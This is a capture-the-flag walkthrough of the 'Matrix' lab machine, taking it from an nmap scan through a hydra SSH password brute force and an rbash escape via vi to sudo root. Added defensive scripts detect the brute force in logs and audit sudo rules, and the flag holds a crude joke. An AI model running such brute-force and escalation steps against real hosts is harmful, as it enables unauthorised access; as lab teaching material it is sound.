The Matrix has you! Another quite easy machine to take down this Monday. It's more of a CTF than a real-life example, but it's really entertaining nonetheless.
This time the machine boots to a nice welcome screen. But since we have no idea what the password is, it's as neat as it is useless.
Now to enumeration:
root@kali:~# nmap -sV -sC -O -A 192.168.89.130
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-16 07:10 EDT
Nmap scan report for 192.168.89.130
Host is up (0.00042s latency).
Not shown: 997 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA)
|   256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA)
|_  256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (ED25519)
80/tcp    open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
31337/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-title: Welcome in Matrix
MAC Address: 00:0C:29:CB:4D:88 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms 192.168.89.130

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.38 seconds

We've got SSH access and two web servers: one on the standard port 80 and one on the odd port 31337. I wonder if 31337 is some reference to the movie.
Ok, let’s check out the website:
Hmm, nothing important. If we check the page source, we find a reference to an image:
port_31337.png looks like this:
Oh, I get it, "Follow the white rabbit". The number 31337 must mean something important. Remember that we saw a web server on this port during the initial scan. Let's go there:
Another web page with no active content. In the page source there's an interesting snippet:
It's base64-encoded text, so it's not hard to "decrypt" it:
root@kali:~# echo ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg= | base64 -d
echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix
Here’s another movie quote and it points to some file with a matrix extension. Let’s try it then:
A needle straight from the haystack. Cypher.matrix is indeed a file we can download and read. It reads, well ..
This is a Matrix =) It doesn't make any sense at first, but Google suggests that this "thing" is written in Brainfuck, an esoteric programming language created in 1993 by Urban Müller. I have no idea how to read this, so I just googled for a translator.
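Instead of pasting a file from an unknown box into a random online translator, it is worth knowing how small the language actually is. The interpreter below is an added example, not code from the original write-up or from the Matrix machine: eight commands, an 8-bit tape, and precomputed bracket matching. The HELLO program is the well-known public-domain "Hello World!" Brainfuck program; the step limit and tape size are assumptions chosen here so that a hostile or simply buggy program fetched from a CTF target cannot spin forever or run off the tape.

```python
"""Minimal Brainfuck interpreter with a step cap.

Added example, not code from the original write-up or from the Matrix
machine. HELLO is the well-known public-domain "Hello World!" program;
max_steps and tape_size are assumptions chosen for safety.
"""


def _match_brackets(code):
    """Precompute matching '[' and ']' offsets; reject unbalanced input."""
    stack, pairs = [], {}
    for i, ch in enumerate(code):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError("unmatched ']' at offset %d" % i)
            j = stack.pop()
            pairs[i], pairs[j] = j, i
    if stack:
        raise ValueError("unmatched '[' at offset %d" % stack[-1])
    return pairs


def run_brainfuck(code, stdin="", max_steps=1_000_000, tape_size=30000):
    """Execute `code` and return everything it printed as a str.

    Cells are 8-bit and wrap around, like most real interpreters.
    `stdin` feeds the ',' command; end of input leaves the cell at 0.
    `max_steps` bounds execution so an untrusted program terminates.
    """
    pairs = _match_brackets(code)
    tape = bytearray(tape_size)
    ptr = pc = steps = 0
    inp = iter(stdin.encode())
    out = []
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded (possible infinite loop)")
        ch = code[pc]
        if ch == ">":
            ptr += 1
            if ptr >= tape_size:
                raise IndexError("pointer ran off the end of the tape")
        elif ch == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("pointer moved before the start of the tape")
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(chr(tape[ptr]))
        elif ch == ",":
            tape[ptr] = next(inp, 0)
        elif ch == "[" and tape[ptr] == 0:
            pc = pairs[pc]          # jump past the matching ']'
        elif ch == "]" and tape[ptr] != 0:
            pc = pairs[pc]          # jump back to the matching '['
        # every other character is a comment and is skipped
        pc += 1
    return "".join(out)


# Public-domain "Hello World!" program (prints "Hello World!\n").
HELLO = ("++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]"
         ">>.>---.+++++++..+++.>>.<-.<.+++.------.--------.>>+.>++.")

if __name__ == "__main__":
    print(run_brainfuck(HELLO), end="")
    # For a downloaded file: run_brainfuck(open("Cypher.matrix").read())
```

The bracket table is built before execution starts, so a file with unbalanced brackets is rejected up front instead of failing halfway through, and the step cap turns an infinite loop into an exception rather than a hung terminal.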
Got it. I think that with the correct login and password we can access the machine via SSH. We have to brute-force the password, since the author is so forgetful. The easiest way is to generate a password list and use it with hydra. We have a clue from the previous step, so only the last two characters are unknown:
root@kali:~# crunch 8 8 -t k1ll0r@@ -f /usr/share/crunch/charset.lst lalpha-numeric-symbol14 -o mypassword.txt
Crunch will now generate the following amount of data: 22500 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 2500
We have 2500 passwords, so it might take some time:
root@kali:~# hydra -l guest -P mypassword.txt 192.168.89.130 ssh
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-05-16 08:07:58
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2500 login tries (l:1/p:2500), ~157 tries per task
[DATA] attacking ssh://192.168.89.130:22/
[STATUS] 180.00 tries/min, 180 tries in 00:01h, 2324 to do in 00:13h, 16 active
[STATUS] 166.67 tries/min, 500 tries in 00:03h, 2004 to do in 00:13h, 16 active
[STATUS] 151.43 tries/min, 1060 tries in 00:07h, 1444 to do in 00:10h, 16 active
[ssh] host: 192.168.89.130   login: guest   password: k1ll0r7n
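A run like this is not quiet: roughly 150 to 180 failed logins a minute from one address land in sshd's log. The script below is an added example, not part of the original write-up, showing the detection side: it parses sshd "Failed/Accepted password" lines, counts failures per source address inside a sliding time window, and notes when a success from the same address follows the burst. The log lines are constructed to resemble what OpenSSH writes to auth.log or the journal during such a run (the source address 192.168.89.128 and the port numbers are made up); the threshold, window and log year are assumptions to tune for your environment.

```python
"""Flag SSH password-guessing bursts in sshd log lines.

Added example, not part of the original write-up. SAMPLE_LOG is
constructed; the attacker address, ports and the 2019 year are assumed.
"""
import re
from collections import defaultdict
from datetime import datetime

# Classic syslog format (no year) as written by OpenSSH.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$")

# Constructed sample: a burst of failures, an unrelated failure, then a success.
SAMPLE_LOG = """\
May 16 08:07:59 porteus sshd[1201]: Failed password for guest from 192.168.89.128 port 40102 ssh2
May 16 08:07:59 porteus sshd[1202]: Failed password for guest from 192.168.89.128 port 40104 ssh2
May 16 08:08:00 porteus sshd[1203]: Failed password for guest from 192.168.89.128 port 40106 ssh2
May 16 08:08:00 porteus sshd[1204]: Failed password for guest from 192.168.89.128 port 40108 ssh2
May 16 08:08:01 porteus sshd[1205]: Failed password for guest from 192.168.89.128 port 40110 ssh2
May 16 08:08:02 porteus sshd[1206]: Failed password for guest from 192.168.89.128 port 40112 ssh2
May 16 08:09:30 porteus sshd[1250]: Failed password for alice from 10.0.0.7 port 51000 ssh2
May 16 08:15:12 porteus sshd[1300]: Accepted password for guest from 192.168.89.128 port 40900 ssh2
""".splitlines()


def parse_line(line, year=2019):
    """Return a dict for a password-auth line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m.group("result"),
            "user": m.group("user"), "ip": m.group("ip")}


def detect_bruteforce(lines, threshold=5, window_s=60):
    """One finding per source IP whose failures inside any `window_s`
    second span reach `threshold`; records a later success from that IP."""
    fails = defaultdict(list)
    success = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["result"] == "Failed":
            fails[ev["ip"]].append(ev["ts"])
        elif ev["ip"] in fails:
            # a success after earlier failures from the same address
            success[ev["ip"]] = (ev["user"], ev["ts"])
    findings = []
    for ip, stamps in fails.items():
        stamps.sort()
        lo = peak = 0
        for hi in range(len(stamps)):          # sliding window over timestamps
            while (stamps[hi] - stamps[lo]).total_seconds() > window_s:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            f = {"ip": ip, "failures": len(stamps), "peak_in_window": peak}
            if ip in success:
                f["compromised_user"], f["success_at"] = success[ip]
            findings.append(f)
    return findings


if __name__ == "__main__":
    for finding in detect_bruteforce(SAMPLE_LOG):
        print(finding)
```

The "success after a burst" field is the one worth paging on: a guessing run that ends in an Accepted line is a compromised account, not just noise. Per-address counting is deliberately simple; a slow distributed run would need the same logic keyed on the target user as well.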
Ok, we have the correct password. Let's use it with SSH:
root@kali:~# ssh guest@192.168.89.130
The authenticity of host '192.168.89.130 (192.168.89.130)' can't be established.
ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.89.130' (ECDSA) to the list of known hosts.
guest@192.168.89.130's password:
guest@porteus:~$ ls
-rbash: /bin/ls: restricted: cannot specify `/' in command names
Something is wrong here. We've got access, but it's restricted by rbash. This is a common way for an administrator to limit what a guest can run. Luckily, there are ways around this restriction:
guest@porteus:~$ echo /home/guest/prog/*
/home/guest/prog/vi
Great, we have vi. I hate vi except for moments like this one =) Let’s start vi and run a command:
Now we are in a proper shell, but we're still just a user. To escalate our privileges we can use a simple command:
Got it. Now let's see what else we can do:
guest@porteus:~$ sudo -l
User guest may run the following commands on porteus:
    (ALL) ALL
    (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
    (trinity) NOPASSWD: /bin/cp
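The first rule is the whole game: "(ALL) ALL" means guest's own password is root's password, so a guessable guest password is a guessable root password. The script below is an added example, not part of the original write-up or of the machine: it parses the rule lines in the form sudo -l prints them and grades each one. SAMPLE is a copy of the output above; the small set of binaries treated as "gives a file write or a shell" is an assumption and would be larger in a real audit.

```python
"""Grade the rule list printed by `sudo -l`.

Added example, not part of the original write-up. SAMPLE copies the
output above; SHELL_OR_WRITE is a deliberately small assumed set.
"""
import re

# Rule lines look like "(runas) TAG: command" or "(runas) command".
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?:(?P<tag>[A-Z]+):\s*)?(?P<cmd>.+?)\s*$")

# Assumption: commands that let the caller write arbitrary files or spawn a shell.
SHELL_OR_WRITE = {"/bin/cp", "/bin/sh", "/bin/bash", "/usr/bin/vi", "/usr/bin/vim"}

SAMPLE = """\
User guest may run the following commands on porteus:
    (ALL) ALL
    (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
    (trinity) NOPASSWD: /bin/cp
"""


def parse_sudo_l(text):
    """Return (runas, tag, command) tuples; header lines are skipped."""
    rules = []
    for line in text.splitlines():
        if not line.lstrip().startswith("("):
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append((m.group("runas").strip(), m.group("tag") or "",
                          m.group("cmd").strip()))
    return rules


def audit(text):
    """One graded finding per rule, highest risk first within each rule."""
    findings = []
    for runas, tag, cmd in parse_sudo_l(text):
        nopasswd = tag == "NOPASSWD"
        how = "without a password" if nopasswd else "with the caller's own password"
        if cmd == "ALL" and runas.upper() in ("ALL", "ROOT"):
            findings.append("HIGH: unrestricted sudo as %s %s; the caller's "
                            "password is effectively root's" % (runas, how))
        elif cmd in SHELL_OR_WRITE:
            findings.append("MEDIUM: %s as %s %s lets the caller write files "
                            "or get a shell as %s" % (cmd, runas, how, runas))
        elif nopasswd:
            findings.append("INFO: %s runs as %s without a password; review the "
                            "binary for argument or environment abuse" % (cmd, runas))
        else:
            findings.append("LOW: %s as %s %s" % (cmd, runas, how))
    return findings


if __name__ == "__main__":
    for line in audit(SAMPLE):
        print(line)
```

On this box the fix is not the NOPASSWD entries but the first line: a guest account should not carry "(ALL) ALL" at all, and any rule that needs a password is only as strong as that password.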
It seems we can just run sudo su now and try the password we already have:
guest@porteus:~$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
root@porteus:/home/guest#
And it does the trick. Now where is our flag, Mr. Anderson?
root@porteus:/home/guest# cd /root
root@porteus:~# ls
Desktop/ Documents/ Downloads/ Music/ Pictures/ Public/ Videos/ flag.txt
root@porteus:~# cat flag.txt
_,-. ,-' _| EVER REWIND OVER AND OVER AGAIN THROUGH THE |_,-O__`-._ INITIAL AGENT SMITH/NEO INTERROGATION SCENE |`-._\`.__ `_. IN THE MATRIX AND BEAT OFF |`-._`-.\,-'_| _,-'. `-.|.-'| |`.-'|_ WHAT | |_|,-'_`. |-._,-' | NO, ME NEITHER jrei | | _,' '-|_,-' IT'S JUST A HYPOTHETICAL QUESTION
Here it is.